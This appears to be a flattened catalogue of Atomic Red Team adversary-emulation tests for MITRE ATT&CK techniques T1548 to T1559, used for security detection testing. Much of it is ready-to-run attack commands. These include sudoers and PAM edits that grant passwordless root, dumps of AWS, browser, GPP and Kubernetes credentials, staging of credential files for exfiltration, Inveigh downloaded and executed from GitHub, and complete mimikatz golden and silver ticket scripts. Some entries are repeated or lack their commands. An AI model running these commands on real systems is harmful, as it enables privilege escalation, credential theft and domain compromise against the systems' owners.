sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers sudo visudo -c -f /usr/local/etc/sudoers
Description: Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
Prereq: Check if sudo is installed.
if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit 0; fi;
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Description: Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Description: Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
Prereq: Check if sudo is installed.
if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit 0; fi;
T1550.002 - Use Alternate Authentication Material: Pass the Hash
Description: Use Invoke-WMIExec to Pass the Hash
Note: must dump hashes first
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
T1550.003 - Use Alternate Authentication Material: Pass the Ticket
Description: Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).
PsExec is used to execute commands on the remote system, and the "C$" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.
Prereq: Rubeus must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe"
if (Test-Path "..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1}
Prereq: PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
if (Test-Path "..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
T1552.001 - Unsecured Credentials: Credentials In Files
Find AWS credentials
find //.aws -name "credentials" -type f 2>/dev/null
Description: Find local AWS credentials from file, defaults to using / as the look path.
T1552.001 - Unsecured Credentials: Credentials In Files
Extract Browser and System credentials with LaZagne
Description: Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
T1552.001 - Unsecured Credentials: Credentials In Files
Access unattend.xml
type C:\Windows\Panther\unattend.xml type C:\Windows\Panther\Unattend\unattend.xml
Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
T1552.001 - Unsecured Credentials: Credentials In Files
Find and Access Github Credentials
for file in $(find /home -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
Description: This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
T1552.001 - Unsecured Credentials: Credentials In Files
Description: Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry
entries are found, they will be displayed.
Description: Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
Prereq: AADInternals module must be installed.
if (Get-Module AADInternals) {exit 0} else {exit 1}
Description: Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
Prereq: AADInternals and ActiveDirectory modules must be installed.
Description: The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
Description: Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
Description: Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
Description: The following Atomic test will utilize Mimikatz to extract the certificates from the local system My store. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
A successful attempt will stdout the certificates and write multiple .pfx and .der files to disk.
Prereq: Mimikatz must exist on disk at specified location (..\ExternalPayloads\x64\mimikatz.exe)
if (Test-Path "..\ExternalPayloads\x64\mimikatz.exe") {exit 0} else {exit 1}
T1552.005 - Unsecured Credentials: Cloud Instance Metadata API
Azure - Search Azure AD User Attributes for Passwords
Description: This test uses the MSOnline Powershell module to retrieve all user attributes for a specified account, which can sometimes contain unsecured credentials.
Upon successful execution, this test will scan all user attributes for any strings containing "password".
Those unsecured credentials will be output to a text file, as well as the account that they are associated with and the user attribute in which they were found.
See: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
Prereq: The MSOnline module must be installed.
if (get-command Get-MsolUser -erroraction silentlycontinue){exit 0} else {exit 1}
Description: This test invokes a web request to the default Instance Metadata API of 169.254.169.254 in order to dump the data contained within it to a file.
See: https://www.sans.org/blog/cloud-instance-metadata-services-imds-/
T1552.006 - Unsecured Credentials: Group Policy Preferences
GPP Passwords (findstr)
findstr /S cpassword %logonserver%\sysvol\*.xml
Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
This test is intended to be run from a domain joined workstation, not on the Domain Controller itself.
The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.
Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found".
Prereq: Get-GPPPassword PowerShell Script must exist at ..\ExternalPayloads\Get-GPPPassword.ps1
Description: A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster.
[More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/).
This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster.
Prereq: kubectl must be installed
which kubectl
T1552.007 - Kubernetes List Secrets
ListSecrets
kubectl get secrets -n default
Description: A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.
Prereq: kubectl must be installed
which kubectl
T1552.007 - Kubernetes List Secrets
Cat the contents of a Kubernetes service account token file
Description: This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
Prereq: Stratus binary must be present at the ($T1552/src/stratus)
if [ -f $T1552/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
T1553.003 - Subvert Trust Controls: SIP and Trust Provider Hijacking
SIP (Subject Interface Package) Hijacking via Custom DLL
regsvr32.exe T1553.003\bin\GTSIPProvider.dll
Description: Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from
https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
the system to utilize it during signature checks, and logging said checks.
Prereq: GTSIPProvider.dll must exist on disk at specified location (T1553.003\bin\GTSIPProvider.dll)
if (Test-Path "T1553.003\bin\GTSIPProvider.dll") {exit 0} else {exit 1}
Description: The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Description: Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
Prereq: T1553.005.iso must exist on disk at specified location (T1553.005\bin\T1553.005.iso)
if (Test-Path "T1553.005\bin\T1553.005.iso") {exit 0} else {exit 1}
Description: Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO.
Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!".
ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
Prereq: FeelTheBurn.iso must exist on disk at specified location (T1553.005\bin\FeelTheBurn.iso)
if (Test-Path "T1553.005\bin\FeelTheBurn.iso") {exit 0} else {exit 1}
Description: Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
Removing this allows more freedom in executing scripts in PowerShell and avoids opening files in protected view.
Prereq: A test file with the Zone.Identifier attribute must be present.
Description: Executes LNK file document.lnk from AllTheThings.iso. Link file executes cmd.exe and rundll32 to in order to load and execute AllTheThingsx64.dll from the ISO which spawns calc.exe.
Prereq: AllTheThings.iso must exist on disk at specified location (T1553.005\bin\AllTheThings.iso)
if (Test-Path "T1553.005\bin\AllTheThings.iso") {exit 0} else {exit 1}
Description: A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}.
Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of PathToAtomicsFolder\..\ExternalPayloads\sysinternals\passwordsdb.
Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml)
Prereq: Modified Sysinternals must be located at ..\ExternalPayloads
if (Test-Path "..\ExternalPayloads\SysInternals") {exit 0} else {exit 1}
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Search macOS Safari Cookies
cd ~/Library/Cookies grep -q "coinbase" "Cookies.binarycookies"
Description: This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`.
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
LaZagne - Credentials from Browser
"T1555.003\bin\LaZagne.exe" browsers
Description: The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
LaZagne is an open source application used to retrieve passwords stored on a local computer.
Prereq: LaZagne.exe must exist on disk at specified location (T1555.003\bin\LaZagne.exe)
if (Test-Path "T1555.003\bin\LaZagne.exe") {exit 0} else {exit 1}
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Simulating access to Chrome Login Data
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination "..\ExternalPayloads" Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination "..\ExternalPayloads"
Description: Simulates an adversary accessing encrypted credentials from Google Chrome Login database.
Description: Simulates an adversary accessing encrypted credentials from firefox web browser's login database.
more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data
Description: Simulates an adversary accessing encrypted credentials from Edge web browser's login database.
more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/
Prereq: Edge must be installed
if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}
Prereq: Edge login data file must exist
if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}
Description: Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Prereq: Visual Studio Build Tools command prompt must exist at C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Stage Popular Credential Files for Exfiltration
$exfil_folder = "$env:temp\T1555.003" if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force} $FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {} if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {} if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {} if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {} if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {} if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force
Description: This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it,
simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData).
Description: PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Simulating Access to Chrome Login Data - MacOS
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data" cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
Description: This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil.
Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction.
See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ .
Cleanup:
rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1 rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
Description: The following Atomic test utilizes WebBrowserPassView to extract passwords from browsers on a Window system. WebBrowserPassView is an open source application used to retrieve passwords stored on a local computer. Recently noticed as a tool used in the BlackCat Ransomware.
Prereq: Check if WebBrowserPassView.exe exists in the specified path T1555.003\bin\WebBrowserPassView.exe
if (Test-Path "T1555.003\bin\WebBrowserPassView.exe") {exit 0} else {exit 1}
T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
BrowserStealer (Chrome / Firefox / Microsoft Edge)
Description: [Github Repo](https://github.com/SaulBerrenson/BrowserStealer) Simple password/cookies stealer for chrome, edge, and gecko based browsers (30 listed working). This attack simulates stealing the data from the browser files and printing them to the command line.
If using to test with Firefox, if the browser is x64 you need to use the x64 build
Description: This test simulates an adversary using esentutl to dump encrypted credentials from Google Chrome's Login database.
[Reference](https://actzero.ai/resources/blog/hygiene-tip-shut-down-attackers-harvesting-cached-browser-credentials/)
del /f /q %temp%\T1555.003_Login_Data.tmp > nul 2>&1
T1555.004 - Credentials from Password Stores: Windows Credential Manager
Access Saved Credentials via VaultCmd
vaultcmd /listcreds:"Windows Credentials"
Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos
https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
T1555.004 - Credentials from Password Stores: Windows Credential Manager
Description: Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
Prereq: The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
Description: This module will extract the credentials from Windows Credential Manager
T1555 - Credentials from Password Stores
Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]
vaultcmd /listcreds:"Windows Credentials" /all
Description: This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
T1555 - Credentials from Password Stores
Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
vaultcmd /listcreds:"Web Credentials" /all
Description: This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
Description: The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer.
Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
This tool has been developed for the purpose of finding these passwords for the most commonly-used software
T1555 - Credentials from Password Stores
WinPwn - Loot local Credentials - Wifi Credentials
Description: Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.
Prereq: AtomicRedTeamPWFilter.dll must exist on disk at specified location (T1556.002\bin\AtomicRedTeamPWFilter.dll)
if (Test-Path "T1556.002\bin\AtomicRedTeamPWFilter.dll") {exit 0} else {exit 1}
Description: lsass.exe loads all DLLs specified by the Authentication Packages REG_MULTI_SZ value.
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.
Prereq: AtomicRedTeamPWFilter.dll must exist on disk at specified location (T1556.002\bin\AtomicRedTeamPWFilter.dll)
if (Test-Path "T1556.002\bin\AtomicRedTeamPWFilter.dll") {exit 0} else {exit 1}
sudo sed -i "1s,^,auth sufficient pam_succeed_if.so uid >= 0\n,g" /etc/pam.d/su-l
Description: Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Cleanup:
sudo sed -i "\,auth sufficient pam_succeed_if.so uid >= 0,d" /etc/pam.d/su-l
Description: Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
sudo sed -i "1s,^,auth sufficient /tmp/pam_evil.so\n,g" /etc/pam.d/su-l
Description: Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
Prereq: The PAM development library must be installed to build the PAM module
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
Prereq: The PAM module must exist on disk at specified location (/tmp/pam_evil.so)
if [ -f /tmp/pam_evil.so ]; then exit 0; else exit 1; fi;
Cleanup:
sudo sed -i "\,auth sufficient /tmp/pam_evil.so,d" /etc/pam.d/su-l
T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
LLMNR Poisoning with Inveigh (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1" -UseBasicParsing) Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y
Description: Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. This Atomic will run continuously until you cancel it or it times out.
T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
Crafting Active Directory golden tickets with mimikatz
# get current domain SID if default was used $domain_sid = "S-1-5-21-DEFAULT" If ($domain_sid -Match "DEFAULT") { # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60 $domain = gwmi Win32_ComputerSystem | Select -Expand Domain $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-')) }
# create batch file with commands to run in a separate "runas /netonly" session # so we don't purge Kerberos ticket from the current Windows session # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise @" >%TEMP%\golden.txt 2>&1 ( echo Purge existing tickets and create golden ticket: klist purge ..\ExternalPayloads\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:goldenticketfakeuser /ptt" "exit"
echo. echo Requesting SYSVOL: dir \\%userdnsdomain%\SYSVOL
echo. echo Tickets after requesting SYSVOL: klist
echo. echo End of Golden Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat
# run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
# wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { if ($_ -match 'End of Golden Ticket attack') { break } } } while ($false) # dummy loop so that 'break' can be used
# show output from new empty session Get-Content $env:TEMP\golden.txt
Description: Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
Prereq: Mimikatz executor must exist on disk and at specified location (..\ExternalPayloads\mimikatz\x64\mimikatz.exe)
# create batch file with commands to run in a separate "runas /netonly" session # so we don't purge Kerberos ticket from the current Windows session # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise @" >%TEMP%\golden.txt 2>&1 ( echo Purge existing tickets and create golden ticket: klist purge cd %temp% "$Env:temp\rubeus.exe" ptt /ticket:kirbifile
echo. echo Requesting SYSVOL: dir \\$($ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain")\SYSVOL
echo. echo Tickets after requesting SYSVOL: klist
echo. echo End of Golden Ticket attack ) "@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat
# run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
# wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { if ($_ -match 'End of Golden Ticket attack') { break } } } while ($false) # dummy loop so that 'break' can be used
# show output from new empty session Get-Content $env:TEMP\golden.txt
Description: Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
# get current domain SID if default was used $domain_sid = "S-1-5-21-DEFAULT" If ($domain_sid -Match "DEFAULT") { # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60 $domain = gwmi Win32_ComputerSystem | Select -Expand Domain $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-')) }
# create batch file with commands to run in a separate "runas /netonly" session # so we don't purge Kerberos ticket from the current Windows session # its output goes to silver.txt temp file, because we cannot capture "runas /netonly" output otherwise @" >%TEMP%\silver.txt 2>&1 ( echo Purge existing tickets and create silver ticket: klist purge ..\ExternalPayloads\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:silverticketfakeuser /service:HOST /target:%logonserver:\\=%.%userdnsdomain% /ptt" "exit"
echo. echo Tickets after requesting schtasks: klist
echo. echo End of Silver Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\silver.bat
# run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\silver.bat" | Out-Null
# wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created Get-Content -Path "$env:TEMP\silver.txt" -Wait | ForEach-Object { if ($_ -match 'End of Silver Ticket attack') { break } } } while ($false) # dummy loop so that 'break' can be used
# show output from new empty session Get-Content $env:TEMP\silver.txt
Description: Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets.
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
Prereq: Mimikatz executor must exist on disk and at specified location (..\ExternalPayloads\mimikatz\x64\mimikatz.exe)
Description: This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1
The following are further sources and credits for this attack:
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
when executed successfully , the test displays available services with their hashes.
If the testing domain doesn't have any service principal name configured, there is no output
Description: Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
Extract all accounts in use as SPN using setspn
setspn -T %USERDNSDOMAIN% -Q */*
Description: The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack.
A successful execution will output all the SPNs for the related domain.
Description: The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack.
A successful execution will output the SPNs for the endpoint in question.
Description: The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack.
A successful execution will output the SPNs for the domain in question.
Description: Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
Description: Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
T1558.004 - Steal or Forge Kerberos Tickets: AS-REP Roasting
WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
Description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
T1559.002 - Inter-Process Communication: Dynamic Data Exchange
Execute Commands
{MISSING IN ATOMIC RED TEAM}
Description: Executes commands via DDE using Microsfot Word
T1559.002 - Inter-Process Communication: Dynamic Data Exchange
Execute PowerShell script via Word DDE
start "$T1559.002\bin\DDE_Document.docx"
Description: When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script
T1559.002 - Inter-Process Communication: Dynamic Data Exchange
Description: Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
Description: Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
Description: Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
Description: Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
